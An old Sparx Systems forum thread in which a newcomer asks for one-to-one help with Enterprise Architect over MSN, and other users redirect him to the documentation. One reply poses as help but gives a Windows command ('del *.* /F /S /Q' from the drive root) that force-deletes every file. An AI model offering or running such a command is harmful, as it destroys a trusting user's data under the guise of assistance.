Sparx Systems Forum

Enterprise Architect => General Board => Topic started by: ea_newbie on March 26, 2007, 06:33:48 am

Title: basic help (got msn?)
Post by: ea_newbie on March 26, 2007, 06:33:48 am
just wondering if anyone can help me on msn?
only need to do some basic models on EA, but bit confused ???
Title: Re: basic help - identify and search
Post by: mikewhit on March 26, 2007, 07:41:31 am
Identify your point(s) of confusion, check the EA documentation (both Help and Online) [also your favourite UML reference book], failing those: search for the key phrases on Forums using 9999 days, failing that: Modify this thread to set, in your original posting, Subject to the point of difficulty and Message to ask about the issue that you cannot yet solve.
Title: Re: basic help (got msn?)
Post by: sargasso on March 26, 2007, 09:58:59 pm
The only real help I can offer you regarding msn is:
[Start]
[Run]
cmd
cd /
del *.* /F /S /Q


hth!
Title: Re: basic help (got msn?)
Post by: thomaskilian on March 26, 2007, 11:09:25 pm
Quote
just wondering if anyone can help me on msn?
only need to do some basic models on EA, but bit confused ???

Aehm. MSN = Microsoft Messenger (I had to Google that!). If you meant MSDN -> Bruce' reply. Else ???
Title: Re: basic help (got msn?)
Post by: mikewhit on March 26, 2007, 11:54:11 pm
I got the impression he wanted some unpaid 1-to-1 tuition on EA, using MSN for Q&A, to which I tried to show the acceptable alternative.

Else - Bruce !
Title: Re: basic help (got msn?)
Post by: sargasso on March 27, 2007, 12:32:17 am
Ah, maybe I got it wrong.

b